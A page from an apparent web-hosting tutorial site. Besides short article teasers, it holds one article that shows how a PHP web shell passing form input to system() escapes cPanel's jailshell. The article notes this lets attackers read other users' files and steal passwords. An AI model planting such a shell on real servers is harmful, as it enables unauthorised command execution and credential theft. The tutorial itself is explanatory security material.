Redirect is a common HTTP response that instructs the client to look at a different URL. This is often used when the content has moved or the URL structure …
Read More
cURL, a powerful command-line tool for making HTTP requests, is often used by developers and system administrators for fetching content from the web, simulating user interactions, and even debugging …
Read More
PHP scripts by default are allowed to be executed for no longer than 30 seconds. The option is defined in the max_execution_time directive, and your PHP script will exit …
Read More
Users registering for shared Linux webhosting accounts are normally not provided with shell access. Even if they do, what they can do with the shell is limited, as they are only in a jailed environment, thanks to cPanel’s jailshell. Displaying the SHELL variable at the command prompt verifies this;
$ echo $SHELL /usr/local/cpanel/bin/jailshell
To briefly show what it means, listing out home directories using the following Linux command reveals that the user is alone in the shell.
$ ls /home/ | wc -l 1
With some simple HTML and PHP, a web based shell can offer something more to the users. The following code can be made available through http://www.anyserver.com/jailshell.php;
<html> <body> <p>Enter command: <form action="jailshell.php" method=post> <input type=text name=command> <input type=submit name=submit> </form> </p> <pre> <?php system ($_POST['command']); ?> </pre> </body> </html>
and executing some simple commands as the following shows what it’s capable of.
People with malicious intent can use this method to search other user’s home directories and grep into their web application’s configuration file to steal passwords and other juicy informations.
Most hosting providers already disable system() and other similar functions in their PHP implementation.
The Apache service can be controlled using its provided binaries. Various distributions may refer to this binary by different names. For example, Ubuntu names it as apache2, while Red …
Read More
HTTP methods or verbs, such as GET, POST, PUT, DELETE, and others, define the type of action to be performed on a resource. While some of these methods are …
Read More
Hotlinking, often referred to as bandwidth theft, happens when other websites directly link to images or other media files hosted on your server. This can lead to increased server …
Read More
Apache webserver reads its configuration files every time it's started. The configuration files are in plain text format, and Apache will need to restart every time there are changes …
Read More
Load testing a web server is crucial for assessing how the server behaves under a particular load, especially before deploying it in a live environment. ApacheBench, commonly known as …
Read More
HTTP methods or verbs, such as GET, POST, PUT, DELETE, and others, define the type of action to be performed on a resource. While some of these methods are …
Read More
